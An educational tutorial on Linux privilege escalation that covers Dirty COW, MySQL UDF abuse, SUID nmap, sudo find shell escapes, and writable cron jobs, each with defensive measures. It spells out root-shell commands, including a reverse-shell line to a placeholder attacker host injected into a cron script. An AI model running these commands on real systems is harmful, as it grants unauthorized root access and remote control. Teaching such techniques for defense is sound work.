Linux Privilege Escalation: Techniques and Examples

Privilege escalation is a critical phase in penetration testing and ethical hacking, where an attacker seeks to gain higher-level permissions on a system. Understanding these techniques not only helps in securing systems but also in identifying potential vulnerabilities during security assessments.

---

Table of Contents

1. Introduction to Privilege Escalation
2. Techniques Used for Privilege Escalation
   • 1. Kernel Exploits
     • Why You Should Avoid Running Local Kernel Exploits
   • 2. Exploiting Services Running as Root
   • 3. Exploiting SUID Executables
   • 4. Exploiting Misconfigured Sudo Rights
   • 5. Exploiting Badly Configured Cron Jobs
3. Preventing Privilege Escalation
4. Conclusion

---

Introduction to Privilege Escalation

In multi-user operating systems like Linux, privileges define what actions a user can perform. Privilege escalation occurs when an attacker gains elevated access to resources that are normally protected, potentially allowing them to:

• Modify or delete critical files
• View sensitive information
• Install malicious software

Understanding how privilege escalation works is essential for both system administrators and security professionals to safeguard systems against unauthorized access.

---

Techniques Used for Privilege Escalation

1. Kernel Exploits

What Are Kernel Exploits?

Kernel exploits leverage vulnerabilities within the Linux kernel to execute arbitrary code with elevated permissions. A successful kernel exploit can grant an attacker root access.

Example: Dirty COW (CVE-2016-5195)

Dirty COW is a well-known vulnerability that allows an unprivileged user to gain write access to read-only memory mappings, leading to privilege escalation.

Steps to Exploit:

1. Identify Vulnerable Kernel Version:

   uname -a

1. Download and Compile the Exploit:

   gcc -pthread dirtycow.c -o dirtycow -lcrypt

1. Execute the Exploit:

   ./dirtycow

1. Gain Root Access:

   su root

Why You Should Avoid Running Local Kernel Exploits

• System Stability Risks: Kernel exploits can crash the system or cause data corruption.
• Detection Risks: Such actions can trigger security alerts, leaving traces in logs.
• Ethical and Legal Implications: Unauthorized exploitation is illegal and unethical.

Alternative Approaches:

• Enumeration: Before attempting kernel exploits, thoroughly enumerate the system for misconfigurations or other vulnerabilities.
• Other Exploitation Methods: Consider exploiting services, SUID binaries, or sudo misconfigurations.

---

2. Exploiting Services Running as Root

Understanding Services Running as Root

Services like web servers, database servers, or file servers sometimes run with root privileges. If these services are vulnerable, they can be exploited to gain root access.

Example: Exploiting a Vulnerable MySQL Service

• Identify MySQL Running as Root:

  ps aux | grep mysql

• Exploit Using User-Defined Functions (UDFs):

An attacker can create a malicious UDF to execute arbitrary code with root privileges.

• Steps:

1. Connect to MySQL:
   

    mysql -u root -p
   

2. Create Malicious UDF:
   

    CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so';
    SELECT sys_exec('chmod u+s /bin/bash');
   

• Gain Root Shell:

  /bin/bash -p

Preventive Measures:

• Run Services with Least Privilege: Configure services to run under dedicated, non-root users.
• Keep Services Updated: Regularly apply patches and updates.
• Firewall Configuration: Restrict access to services using firewalls.

---

3. Exploiting SUID Executables

What Are SUID Executables?

SUID (Set User ID upon execution) allows users to run an executable with the permissions of the executable's owner.

Risk:

• If an SUID executable is vulnerable or misconfigured, it can be exploited to execute commands with elevated privileges.

Example: Exploiting SUID nmap

• Identify SUID nmap:

  find / -perm -u=s -type f 2>/dev/null | grep nmap

• Use Interactive Mode:

  nmap --interactive

• Escape to Shell:

  nmap> !sh

• Result: A shell with root privileges.

Preventive Measures:

• Audit SUID Files: Regularly check for SUID files that shouldn't have elevated permissions.

  find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

• Limit SUID Binaries: Only essential binaries should have the SUID bit set.
• User Awareness: Educate users and administrators about the risks of setting SUID bits.

---

4. Exploiting Misconfigured Sudo Rights

Understanding Sudo Misconfigurations

sudo allows permitted users to execute commands as the superuser or another user. Misconfigurations can grant users unintended privileges.

Example: Exploiting Sudo Rights with find

• Check Sudo Permissions:

  sudo -l

Output might show: (ALL) NOPASSWD: /usr/bin/find

• Exploit:

  sudo find / -exec /bin/sh \; -quit

• Result: A root shell.

Other Vulnerable Binaries:

• Editors like vi, nano
• Scripting languages like python, perl

Preventive Measures:

• Restrictive Sudoers File: Only allow specific commands that do not allow shell escapes.
• Avoid NOPASSWD Where Not Necessary: Require passwords for sudo to add an extra layer of security.
• Regular Audits: Periodically review the /etc/sudoers file.

---

5. Exploiting Badly Configured Cron Jobs

Understanding Cron Jobs

Cron is a time-based job scheduler that runs scripts or commands at specified times or dates.

Risk:

• If a cron job runs a script with root privileges and the script is writable by others, it can be modified to include malicious commands.

Example: Writable Script in Cron Job

• Find Cron Jobs:

  cat /etc/crontab

• Identify Writable Scripts:

  find / -writable -type f 2>/dev/null

• Exploit:

1. Modify the Script:
   

    echo "/bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1" >> /path/to/script.sh
   

2. Wait for Cron Execution: When the cron job runs, it executes the modified script.

• Result: Reverse shell with root privileges.

Preventive Measures:

• Secure File Permissions: Ensure that scripts executed by cron are not writable by unprivileged users.

  chmod 700 /path/to/script.sh

• Least Privilege: Run cron jobs with the minimum required privileges.
• Monitor Cron Directories: Regularly check /etc/cron.* directories for unauthorized changes.

---

Preventing Privilege Escalation

General Best Practices:

• Principle of Least Privilege: Users and processes should have only the permissions they need.
• Regular Updates: Keep the system and all software up to date.
• Security Audits: Regularly audit systems for vulnerabilities and misconfigurations.
• Monitoring and Logging: Implement comprehensive logging and monitor for suspicious activities.

Specific Measures:

• SUID/GUID Management: Limit the use of SUID/GUID bits and regularly review files with these permissions.

• Sudo Configuration:

  • Use full path specifications in /etc/sudoers.
  • Avoid using NOPASSWD unless necessary.
  • Limit sudo permissions to essential commands.

• Cron Job Security:

  • Ensure cron scripts are owned by root and not writable by others.
  • Use absolute paths in cron scripts.

• Service Configuration:

  • Run services as dedicated non-root users.
  • Restrict access using firewalls and hosts.allow/hosts.deny.

• User Education:

  • Train users on security best practices.
  • Encourage reporting of suspicious activities.

---

Conclusion

Privilege escalation exploits vulnerabilities, misconfigurations, or design flaws to gain unauthorized access to higher privileges on a system. By understanding common techniques—such as kernel exploits, misconfigured services, SUID misuse, sudo misconfigurations, and cron job vulnerabilities—you can better secure systems against these threats.

Regular system auditing, adherence to the principle of least privilege, and maintaining up-to-date systems are critical in preventing privilege escalation. Awareness and proactive measures are your best defense against potential attackers seeking to gain unauthorized access.

---

Note: This guide is intended for educational purposes. Unauthorized access or exploitation of systems without permission is illegal and unethical.